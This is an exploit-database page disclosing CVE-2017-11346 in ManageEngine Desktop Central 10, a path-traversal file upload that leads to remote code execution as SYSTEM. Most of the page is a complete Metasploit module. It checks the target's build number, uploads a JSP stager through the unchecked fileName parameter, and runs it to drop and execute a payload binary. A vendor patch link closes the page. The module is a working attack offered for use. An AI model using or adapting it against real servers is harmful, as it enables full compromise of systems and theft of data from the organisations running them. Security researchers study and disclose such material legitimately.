Home / os / winmobile

ManageEngine Desktop Central 10 Build 100087 Remote Code Execution

Posted on 25 July 2017

# Exploit Title: ManageEngine Desktop Central 10 Build 100087 RCE # Date: 24-07-2017 # Software Link: https://www.manageengine.com/products/desktop-central/ # Exploit Author: Kacper Szurek # Contact: https://twitter.com/KacperSzurek # Website: https://security.szurek.pl/ # CVE: CVE-2017-11346 # Category: remote 1. Description When uploading a file, the `FileUploadServlet` class does not check the user-controlled `fileName` parameter using `hasVulnerabilityInFileName` function. This allows a remote attacker to create a malicious file and place it under a directory that allows server-side scripts to run, which results in remote code execution under the context of SYSTEM. https://security.szurek.pl/manageengine-desktop-central-10-build-100087-rce.html 2. Proof of Concept Metasploit module: https://github.com/kacperszurek/exploits/blob/master/ManageEngineDesktopCentral/manageengine_filename_rce.rb manageengine_filename_rce.rb: ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'nokogiri' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::EXE include Msf::Exploit::FileDropper def initialize(info={}) super(update_info(info, 'Name' => "ManageEngine Desktop Central 10 FileUploadServlet fileName RCE Vulnerability", 'Description' => %q{ This module exploits a vulnerability found in ManageEngine Desktop Central 10. When uploading a file, the FileUploadServlet class does not check the user-controlled fileName parameter. This allows a remote attacker to create a malicious file and place it under a directory that allows server-side scripts to run, which results in remote code execution under the context of SYSTEM. This exploit was successfully tested on version 10, build 100087. Exploit code based on https://www.exploit-db.com/exploits/38982/ }, 'License' => MSF_LICENSE, 'Author' => [ 'Kacper Szurek' ], 'References' => [ [ 'URL', 'https://security.szurek.pl/manageengine-desktop-central-10-build-100087-rce.html' ] ], 'Platform' => 'win', 'Targets' => [ [ 'ManageEngine Desktop Central 10 on Windows', {} ] ], 'Payload' => { 'BadChars' => "x00" }, 'Privileged' => false, 'DisclosureDate' => "July 24 2017", 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI', [true, 'The base path for ManageEngine Desktop Central', '/']), Opt::RPORT(8020) ], self.class) end def jsp_drop_bin(bin_data, output_file) jspraw = %Q|<%@ page import="java.io.*" %> | jspraw << %Q|<% | jspraw << %Q|String data = "#{Rex::Text.to_hex(bin_data, "")}"; | jspraw << %Q|FileOutputStream outputstream = new FileOutputStream("#{output_file}"); | jspraw << %Q|int numbytes = data.length(); | jspraw << %Q|byte[] bytes = new byte[numbytes/2]; | jspraw << %Q|for (int counter = 0; counter < numbytes; counter += 2) | jspraw << %Q|{ | jspraw << %Q| char char1 = (char) data.charAt(counter); | jspraw << %Q| char char2 = (char) data.charAt(counter + 1); | jspraw << %Q| int comb = Character.digit(char1, 16) & 0xff; | jspraw << %Q| comb <<= 4; | jspraw << %Q| comb += Character.digit(char2, 16) & 0xff; | jspraw << %Q| bytes[counter/2] = (byte)comb; | jspraw << %Q|} | jspraw << %Q|outputstream.write(bytes); | jspraw << %Q|outputstream.close(); | jspraw << %Q|%> | jspraw end def jsp_execute_command(command) jspraw = %Q|<%@ page import="java.io.*" %> | jspraw << %Q|<% | jspraw << %Q|try { | jspraw << %Q| Runtime.getRuntime().exec("chmod +x #{command}"); | jspraw << %Q|} catch (IOException ioe) { } | jspraw << %Q|Runtime.getRuntime().exec("#{command}"); | jspraw << %Q|%> | jspraw end def get_jsp_stager exe = generate_payload_exe(code: payload.encoded) jsp_fname = "#{Rex::Text.rand_text_alpha(5)}.jsp" register_files_for_cleanup("../webapps/DesktopCentral/jspf/#{jsp_fname}") { jsp_payload: jsp_drop_bin(exe, jsp_fname) + jsp_execute_command(jsp_fname), jsp_name: jsp_fname } end def get_build_number(res) inputs = res.get_hidden_inputs inputs.first['buildNum'] end def get_html_title(res) html = res.body n = ::Nokogiri::HTML(html) x = n.xpath('//title').text end def check uri = normalize_uri(target_uri.path, '/configurations.do') res = send_request_cgi({ 'method' => 'GET', 'uri' => uri }) unless res print_error("Connection timed out") return Exploit::CheckCode::Unknown end build_number = get_build_number(res) if build_number.to_s.empty? print_error("Cannot find build number") else print_status("Found build number: #{build_number}") end html_title = get_html_title(res) if html_title.to_s.empty? print_error("Cannot find title") else print_status("Found title: #{html_title}") end if build_number.to_i <= 100087 return Exploit::CheckCode::Appears elsif /ManageEngine Desktop Central 10/ === html_title return Exploit::CheckCode::Detected end Exploit::CheckCode::Safe end def upload_jsp(stager_info) uri = normalize_uri(target_uri.path, 'fileupload') res = send_request_cgi({ 'method' => 'POST', 'uri' => uri, 'ctype' => 'application/octet-stream', 'encode_params' => false, 'data' => stager_info[:jsp_payload], 'vars_get' => { 'action' => 'HelpDesk_video', 'computerName' => Rex::Text.rand_text_alpha(rand(10)+5), 'resourceId' => 1, 'customerId' => 1, 'fileName' => "\..\..\..\..\jspf\#{stager_info[:jsp_name]}" } }) if res.nil? fail_with(Failure::Unknown, "Connection timed out while uploading to #{uri}") elsif res && res.code != 200 fail_with(Failure::Unknown, "The server returned #{res.code}, but 200 was expected.") end end def exec_jsp(stager_info) uri = normalize_uri(target_uri.path, "/jspf/#{stager_info[:jsp_name]}") res = send_request_cgi({ 'method' => 'GET', 'uri' => uri }) if res.nil? fail_with(Failure::Unknown, "Connection timed out while executing #{uri}") elsif res && res.code != 200 fail_with(Failure::Unknown, "Failed to execute #{uri}. Server returned #{res.code}") end end def exploit print_status("Creating JSP stager") stager_info = get_jsp_stager print_status("Uploading JSP stager #{stager_info[:jsp_name]}...") upload_jsp(stager_info) print_status("Executing stager...") exec_jsp(stager_info) end end 3. Solution: https://www.manageengine.com/products/desktop-central/remote-code-execution.html

 

TOP